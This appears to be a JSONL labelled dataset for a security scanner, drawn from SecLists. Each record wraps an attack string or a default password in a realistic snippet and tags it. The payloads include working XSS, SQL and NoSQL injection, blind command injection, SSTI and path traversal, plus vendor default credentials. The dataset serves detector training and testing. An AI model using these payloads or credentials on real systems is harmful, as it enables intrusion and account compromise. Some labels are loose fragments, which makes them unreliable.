"malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#X3c", "injection_type": "cmd"}}]} {"id": "seclists_03136", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Digital Equipment,<BLANK>,SYSTEM,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Digital Equipment,<BLANK>,SYSTEM,"}}]} {"id": "seclists_03137", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=|id HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|id", "injection_type": "cmd"}}]} {"id": "seclists_03138", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=or '1'='1 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or '1'='1", "injection_type": "SQL"}}]} {"id": "seclists_03139", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%7C%20%5B%203%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%203%20-ne%20%24%28echo%20SQHKCG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26", "injection_type": "cmd"}}]} {"id": "seclists_03140", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Ambit,user,user,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Ambit,user,user,"}}]} {"id": "seclists_03141", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<bdo onpaste=\"alert(1)\" contenteditable>test</bdo> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<bdo onpaste=\"alert(1)\" contenteditable>test</bdo>", "injection_type": "XSS"}}]} {"id": "seclists_03142", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<x%0Donxxx=1\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x%0Donxxx=1", "injection_type": "XSS"}}]} {"id": "seclists_03143", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Self-contained XSS variant 3</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Self-contained XSS variant 3", "injection_type": "XSS"}}]} {"id": "seclists_03144", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ${exec(print(`echo%20XRESBN`.`echo%20$((9%2B10))`.`echo%20XRESBN`.`echo%20XRESBN`)%3B//XRESBN", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "${exec(print(`echo%20XRESBN`.`echo%20$((9%2B10))`.`echo%20XRESBN`.`echo%20XRESBN`)%3B//XRESBN", "injection_type": "cmd"}}]} {"id": "seclists_03145", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=IBM,qsvr,qsvr,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "IBM,qsvr,qsvr,"}}]} {"id": "seclists_03146", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><pre ondblclick=\"alert(1)\">test</pre></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<pre ondblclick=\"alert(1)\">test</pre>", "injection_type": "XSS"}}]} {"id": "seclists_03147", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Novell,PRINTER,<BLANK>,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Novell,PRINTER,<BLANK>,"}}]} {"id": "seclists_03148", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Hewlett-Packard,WP,HPOFFICE,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Hewlett-Packard,WP,HPOFFICE,"}}]} {"id": "seclists_03149", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=tommie\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "tommie"}}]} {"id": "seclists_03150", "source": "seclists", "source_license": "MIT", "text": "password: 7bgiqk\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "7bgiqk"}}]} {"id": "seclists_03151", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%7C%20%5B%206%20-ne%20%24%28echo%20HDECHS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%206%20-ne%20%24%28echo%20HDECHS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527", "injection_type": "cmd"}}]} {"id": "seclists_03152", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%3Becho$IFSBRMMWH$((16%2B74))$(echo$IFSBRMMWH)BRMMWH%27 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3Becho$IFSBRMMWH$((16%2B74))$(echo$IFSBRMMWH)BRMMWH%27", "injection_type": "cmd"}}]} {"id": "seclists_03153", "source": "seclists", "source_license": "MIT", "text": "filename=%27%0aecho$IFSCNBVMZ$((1%2B71))$(echo$IFSCNBVMZ)CNBVMZ%22", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%0aecho$IFSCNBVMZ$((1%2B71))$(echo$IFSCNBVMZ)CNBVMZ%22", "injection_type": "cmd"}}]} {"id": "seclists_03154", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Name: Textarea-breaker with mouseover</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Textarea-breaker with mouseover", "injection_type": "XSS"}}]} {"id": "seclists_03155", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:planet,admin,admin,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "planet,admin,admin,"}}]} {"id": "seclists_03156", "source": "seclists", "source_license": "MIT", "text": "POST /api/login HTTP/1.1\nContent-Type: application/json\n\n', $or: [ {}, { 'a':'a", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "', $or: [ {}, { 'a':'a", "injection_type": "NoSQL"}}]} {"id": "seclists_03157", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<div draggable=\"true\" contenteditable>drag me</div><ruby ondragover=alert(1) contenteditable>drop here</ruby> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><ruby ondragover=alert(1) contenteditable>drop here</ruby>", "injection_type": "XSS"}}]} {"id": "seclists_03158", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><x onmousedown=alert(1)>click this!</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x onmousedown=alert(1)>click this!", "injection_type": "XSS"}}]} {"id": "seclists_03159", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf |echo$IFSXDYAKY$((50%2B55))$(echo$IFSXDYAKY)XDYAKY//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|echo$IFSXDYAKY$((50%2B55))$(echo$IFSXDYAKY)XDYAKY//", "injection_type": "cmd"}}]} {"id": "seclists_03160", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Author Name: ha.ckers.org</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_03161", "source": "seclists", "source_license": "MIT", "text": "filename=%7C%7Cecho$IFSWJYCOX$((21%2B64))$(echo$IFSWJYCOX)WJYCOX%27", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%7Cecho$IFSWJYCOX$((21%2B64))$(echo$IFSWJYCOX)WJYCOX%27", "injection_type": "cmd"}}]} {"id": "seclists_03162", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Description: &JavaScript includes (works in Netscape 4.x). HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: &JavaScript includes (works in Netscape 4.x).", "injection_type": "XSS"}}]} {"id": "seclists_03163", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<div draggable=\"true\" contenteditable>drag me</div><ol ondragover=alert(1) contenteditable>drop here</ol> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><ol ondragover=alert(1) contenteditable>drop here</ol>", "injection_type": "XSS"}}]} {"id": "seclists_03164", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %26%26echo$IFSLOYHDY$((15%2B20))$(echo$IFSLOYHDY)LOYHDY//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%26echo$IFSLOYHDY$((15%2B20))$(echo$IFSLOYHDY)LOYHDY//", "injection_type": "cmd"}}]} {"id": "seclists_03165", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F", "injection_type": "cmd"}}]} {"id": "seclists_03166", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<form><input formaction=javascript:alert(1) type=image value=click>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<form><input formaction=javascript:alert(1) type=image value=click>", "injection_type": "XSS"}}]} {"id": "seclists_03167", "source": "seclists", "source_license": "MIT", "text": "filename=%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X", "injection_type": "cmd"}}]} {"id": "seclists_03168", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><blink draggable=\"true\" ondragleave=\"alert(1)\">test</blink></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<blink draggable=\"true\" ondragleave=\"alert(1)\">test</blink>", "injection_type": "XSS"}}]} {"id": "seclists_03169", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf '%3Becho%20UFYCCQ$((51%2B2))$(echo%20UFYCCQ)UFYCCQ&", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%3Becho%20UFYCCQ$((51%2B2))$(echo%20UFYCCQ)UFYCCQ&", "injection_type": "cmd"}}]} {"id": "seclists_03170", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<body draggable=\"true\" ondrag=\"alert(1)\">test</body> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<body draggable=\"true\" ondrag=\"alert(1)\">test</body>", "injection_type": "XSS"}}]} {"id": "seclists_03171", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %0A%20str%3D%24%28echo%20IVBAZQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20IVBAZQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526", "injection_type": "cmd"}}]} {"id": "seclists_03172", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Yuxin,User,19750407,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Yuxin,User,19750407,"}}]} {"id": "seclists_03173", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=order by HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "order by", "injection_type": "SQL"}}]} {"id": "seclists_03174", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=chance1\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "chance1"}}]} {"id": "seclists_03175", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522", "injection_type": "cmd"}}]} {"id": "seclists_03176", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:bambi", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "bambi"}}]} {"id": "seclists_03177", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<isindex draggable=\"true\" ondragleave=\"alert(1)\">test</isindex>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<isindex draggable=\"true\" ondragleave=\"alert(1)\">test</isindex>", "injection_type": "XSS"}}]} {"id": "seclists_03178", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=erica\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "erica"}}]} {"id": "seclists_03179", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Novell,ROOT,<BLANK>,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Novell,ROOT,<BLANK>,"}}]} {"id": "seclists_03180", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Description: URL string evasion (assuming \u201dhttp://www.google.com/\u201d is programmatically disallowed).</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: URL string evasion (assuming \u201dhttp://www.google.com/\u201d is programmatically disallowed).", "injection_type": "XSS"}}]} {"id": "seclists_03181", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Name: Null Chars 2</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Null Chars 2", "injection_type": "XSS"}}]} {"id": "seclists_03182", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=s>};function f() { 0[this.x](this.y) }f.call(o); HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "s>};function f() { 0[this.x](this.y) }f.call(o);", "injection_type": "XSS"}}]} {"id": "seclists_03183", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>location</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "location", "injection_type": "XSS"}}]} {"id": "seclists_03184", "source": "seclists", "source_license": "MIT", "text": "#!/bin/sh\n\njar -cvf cmd.war warfiles/*\n", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "sh", "filename": "makewar.sh"}}]} {"id": "seclists_03185", "source": "seclists", "source_license": "MIT", "text": "filename=%27%7C%20%5B%202%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%7C%20%5B%202%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C", "injection_type": "cmd"}}]} {"id": "seclists_03186", "source": "seclists", "source_license": "MIT", "text": "username=admin') or '1'='1'/*&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin') or '1'='1'/*", "injection_type": "SQL"}}]} {"id": "seclists_03187", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<x ondblclick=alert(1)>double click this!\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x ondblclick=alert(1)>double click this!", "injection_type": "XSS"}}]} {"id": "seclists_03188", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Tags: general, injection, gecko, style injection, XBL</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, injection, gecko, style injection, XBL", "injection_type": "XSS"}}]} {"id": "seclists_03189", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<ol oncontextmenu=\"alert(1)\">test</ol>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<ol oncontextmenu=\"alert(1)\">test</ol>", "injection_type": "XSS"}}]} {"id": "seclists_03190", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: <youremail>%0d%0aBcc:<youremail>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<youremail>%0d%0aBcc:<youremail>", "injection_type": "cmd"}}]} {"id": "seclists_03191", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'admin\" or 1=1';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin\" or 1=1", "injection_type": "SQL"}}]} {"id": "seclists_03192", "source": "seclists", "source_license": "MIT", "text": "GET /profile?name={42*42} HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "{42*42}", "injection_type": "SSTI"}}]} {"id": "seclists_03193", "source": "seclists", "source_license": "MIT", "text": "filename=/&apos;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/&apos;", "injection_type": "cmd"}}]} {"id": "seclists_03194", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=&apos;%20OR HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&apos;%20OR", "injection_type": "SQL"}}]} {"id": "seclists_03195", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %7Cecho$IFSGZSLCQ$((53%2B35))$(echo$IFSGZSLCQ)GZSLCQ", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7Cecho$IFSGZSLCQ$((53%2B35))$(echo$IFSGZSLCQ)GZSLCQ", "injection_type": "cmd"}}]} {"id": "seclists_03196", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Oracle,PLEX,PLEX,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Oracle,PLEX,PLEX,"}}]} {"id": "seclists_03197", "source": "seclists", "source_license": "MIT", "text": "{% block content %}\n<h1>Hello _self.getTemplateName().__toString</h1>\n{% endblock %}", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "_self.getTemplateName().__toString", "injection_type": "SSTI"}}]} {"id": "seclists_03198", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Author Name: -unknown-</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: -unknown-", "injection_type": "XSS"}}]} {"id": "seclists_03199", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=admin\" or \"1\"=\"1\"# HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin\" or \"1\"=\"1\"#", "injection_type": "SQL"}}]} {"id": "seclists_03200", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Tags: general, evil tags, style injection</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, style injection", "injection_type": "XSS"}}]} {"id": "seclists_03201", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Description: This vector uses line breaks to obfuscate and evaluates the location hash.</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector uses line breaks to obfuscate and evaluates the location hash.", "injection_type": "XSS"}}]} {"id": "seclists_03202", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Self-contained XSS variant 1 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Self-contained XSS variant 1", "injection_type": "XSS"}}]} {"id": "seclists_03203", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>UTF-8 Unicode Encoding</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "UTF-8 Unicode Encoding", "injection_type": "XSS"}}]} {"id": "seclists_03204", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=harrier\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "harrier"}}]} {"id": "seclists_03205", "source": "seclists", "source_license": "MIT", "text": "password: scout\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "scout"}}]} {"id": "seclists_03206", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=* HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "*", "injection_type": "cmd"}}]} {"id": "seclists_03207", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><samp onmousedown=\"alert(1)\">test</samp></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<samp onmousedown=\"alert(1)\">test</samp>", "injection_type": "XSS"}}]} {"id": "seclists_03208", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: /..\\../..\\../..\\../..\\../..\\../..\\../boot.ini", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/..\\../..\\../..\\../..\\../..\\../..\\../boot.ini", "injection_type": "cmd"}}]} {"id": "seclists_03209", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<isindex onmouseleave=\"alert(1)\">test</isindex> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<isindex onmouseleave=\"alert(1)\">test</isindex>", "injection_type": "XSS"}}]} {"id": "seclists_03210", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf insert", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "insert", "injection_type": "cmd"}}]} {"id": "seclists_03211", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: ${proc_open(print(`echo%20CPKMZS`.`echo%20$((71%2B91))`.`echo%20CPKMZS`.`echo%20CPKMZS`)%3B.%27CPKMZS", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "${proc_open(print(`echo%20CPKMZS`.`echo%20$((71%2B91))`.`echo%20CPKMZS`.`echo%20CPKMZS`)%3B.%27CPKMZS", "injection_type": "cmd"}}]} {"id": "seclists_03212", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=/%2A HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/%2A", "injection_type": "cmd"}}]} {"id": "seclists_03213", "source": "seclists", "source_license": "MIT", "text": "username=?&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "?", "injection_type": "SQL"}}]} {"id": "seclists_03214", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=clover\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "clover"}}]} {"id": "seclists_03215", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><svg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(document.domain)\"/></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<svg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(document.domain)\"/>", "injection_type": "XSS"}}]} {"id": "seclists_03216", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: XML namespace. The .htc file must be located on the server as your XSS vector.\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: XML namespace. The .htc file must be located on the server as your XSS vector.", "injection_type": "XSS"}}]} {"id": "seclists_03217", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:alisha@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "alisha"}}]} {"id": "seclists_03218", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<head id=x tabindex=1 onbeforeactivate=alert(1)></head> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], 